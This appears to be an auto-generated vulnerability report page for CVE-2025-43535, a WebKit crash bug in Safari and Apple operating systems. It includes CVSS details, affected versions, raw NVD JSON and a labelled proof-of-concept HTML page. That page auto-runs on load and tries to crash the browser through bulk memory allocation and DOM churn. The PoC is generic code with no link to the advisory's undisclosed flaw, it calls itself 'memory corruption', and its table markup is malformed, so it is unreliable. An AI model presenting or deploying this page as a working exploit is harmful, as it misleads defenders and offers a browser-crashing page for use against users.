Security Vulnerability Report
CVE-2025-43535 CVSS 4.3 MEDIUM

CVE-2025-43535

Published: 2025-12-17 21:16:12
Last Modified: 2025-12-18 19:34:57

Description

The issue was addressed with improved memory handling. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
Apple Safari < 26.2
Apple iOS < 18.7.3
Apple iOS < 26.2
Apple iPadOS < 18.7.3
Apple iPadOS < 26.2
Apple macOS Tahoe < 26.2
Apple visionOS < 26.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
// CVE-2025-43535 PoC - WebKit Memory Corruption leading to crash
// Target: Apple Safari and WebKit-based browsers
// This PoC demonstrates triggering the memory handling issue
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-43535 PoC</title>
</head>
<body>
  <h1>Memory Corruption PoC - Do not close this page</h1>
  <div id="status">Testing memory handling...</div>
  <script>
    // PoC for CVE-2025-43535
    // This triggers memory handling issues in WebKit
    function triggerVulnerability() {
      const status = document.getElementById('status');
      try {
        // Create memory pressure through object manipulation
        const objects = [];

        // Phase 1: Create and destroy objects rapidly
        for (let i = 0; i < 100000; i++) {
          const obj = {
            prop1: new Array(10000).fill(Math.random()),
            prop2: document.createElement('div'),
            prop3: new Uint8Array(50000)
          };
          objects.push(obj);
          if (i % 1000 === 0) {
            objects.splice(0, 500);
          }
        }

        // Phase 2: Trigger DOM manipulation under memory pressure
        const container = document.createElement('div');
        container.innerHTML = '<table><tbody>' + '<tr>' + '<td>' + 'A'.repeat(10000) + '</td>' + '</tr>'.repeat(100) + '</tbody></table>';

        // Phase 3: Rapid attribute manipulation
        for (let j = 0; j < 5000; j++) {
          const td = container.querySelector('td');
          if (td) {
            td.setAttribute('data-index', j);
            td.removeAttribute('data-index');
          }
        }

        // Phase 4: Force garbage collection and crash
        container.innerHTML = '';
        status.innerHTML = 'Vulnerability trigger attempted. Check for crash.';
      } catch (e) {
        status.innerHTML = 'Error: ' + e.message;
      }
    }

    // Auto-trigger on page load
    window.onload = function() {
      setTimeout(triggerVulnerability, 1000);
    };
  </script>
</body>
</html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43535", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:12.167", "lastModified": "2025-12-18T19:34:56.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was addressed with improved memory handling. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "3ECBF838-536C-47F9-9876-C526B8ED32EC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "6547722A-1226-4E23-B3AE-8692B07C2657"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "8B71D919-1AA2-4F17-A834-4B703E36F7E2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "8928A377-93BD-49AD-B4FE-5B2328EBDB70"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "10FD01C3-D77F-4FE4-8195-F2C59FB1321C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "FBA92B6D-E36C-432B-A041-94D81427CD75"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EB10D901-4800-4DF9-AB35-48017C178161"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125885", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125886", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125891", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125892", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}